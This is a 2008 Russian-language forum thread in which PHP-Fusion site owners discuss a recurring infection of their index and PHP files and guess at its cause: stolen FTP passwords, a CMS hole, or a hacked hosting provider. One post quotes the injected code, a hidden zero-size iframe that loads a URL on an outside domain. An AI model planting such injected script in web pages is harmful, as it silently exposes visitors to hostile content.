Администратор Сообщений: 3023 Откуда: Astana Зарегистрирован: 01 Апреля 2007, 18:11:10 Сказали спасибо 470 раз Статус: offline
Опубликовано 25 Сентября 2008, 19:45:40
возможно хакнули твой комп... стырили пароли и через фтп поменяли файлы...
нужно логи изучать, какой хостер, какая версия двига, какие сторонние плагины, сколько сайтов на одном аккаунте!
Завсегдатый Сообщений: 54 Зарегистрирован: 07 Февраля 2008, 12:34:26 Сказали спасибо 2 раз Статус: offline
Опубликовано 25 Сентября 2008, 19:54:54
Та же проблема была.
Есть основной сайт, + рядом поставил php-fusion sf последней версии(для теста). Так он долгое время и висел. Через какое то время папки основного сайта и папка с фьюджином,
были заражены ([script language=javascript]status=location;document.write('[!--iframe src="http://online-channels.info/in.cgi?traf" width=0 height=0 frameborder=0 display:none onLoad="status=defaultStatus;"][/iframe--]) все файлы index*php*html*htm, + ещё пхп файла с другими именами.
Все почистил, через день макс снова все заражено. Снес фьюджин, почистил файлы, уже 3-4 месяца норм.
Пароли врядли кто мог украсть.
Я думаю тут где-то дырка в движке. Со временем если это так, думаю появится у многих
Администратор Сообщений: 3023 Откуда: Astana Зарегистрирован: 01 Апреля 2007, 18:11:10 Сказали спасибо 470 раз Статус: offline
Опубликовано 25 Сентября 2008, 20:10:59
хы... вот чесно хз... возможно ктото нашел новую дыру... но пока об этом мало извесно... хотя как добовлять бэдкоды при условии что права стоят нужные..
Местный Сообщений: 19 Зарегистрирован: 17 Декабря 2007, 04:23:44 Сказали спасибо 0 раз Статус: offline
Опубликовано 26 Сентября 2008, 11:02:22
Sky написал:
хы... вот чесно хз... возможно ктото нашел новую дыру... но пока об этом мало извесно... хотя как добовлять бэдкоды при условии что права стоят нужные..
Sky, я уже несколько раз до этого сайт обновлял и ставил, все права ставлю, какие надо, и какие указаны в документе при инсталляции. Фрейм записался только в index.php файлы. Что очень не приятно, поскольку их много. Я все же склоняюсь, что хакнули именно хостера, а не движок. Если бы потырили пароль ftp - не стали бы думаю тупо добавлять строчку ко всем index.php. Явно, что работало автоматически, и искало оно именно определенные файлы. Посмотрел в нете - появляется такое именно когда хакают хостера, лазят по его папкам, и меняют все, что хотят. Или юзают эксплойт. Вообщем думаю надо еще хостеру написать.
Администратор Сообщений: 3023 Откуда: Astana Зарегистрирован: 01 Апреля 2007, 18:11:10 Сказали спасибо 470 раз Статус: offline
Опубликовано 26 Сентября 2008, 12:11:56
с такими проблема не только фужин сталкивается... почитайте к примеру форум славхоста... там начиная от самописного и заканчивая такими грандами как битрикс страдают от фреймов в индекс файлах
Местный Сообщений: 19 Зарегистрирован: 17 Декабря 2007, 04:23:44 Сказали спасибо 0 раз Статус: offline
Опубликовано 26 Сентября 2008, 13:55:38
геморно это все вообщем. К Fusion нареканий нет. Это явно не его проблема. Просто устал удалять фрейм из файлов. А переписывать файлы не хотелось, поскольку изменения вносил.
Регистрация 
А переписывать файлы не хотелось, поскольку изменения вносил.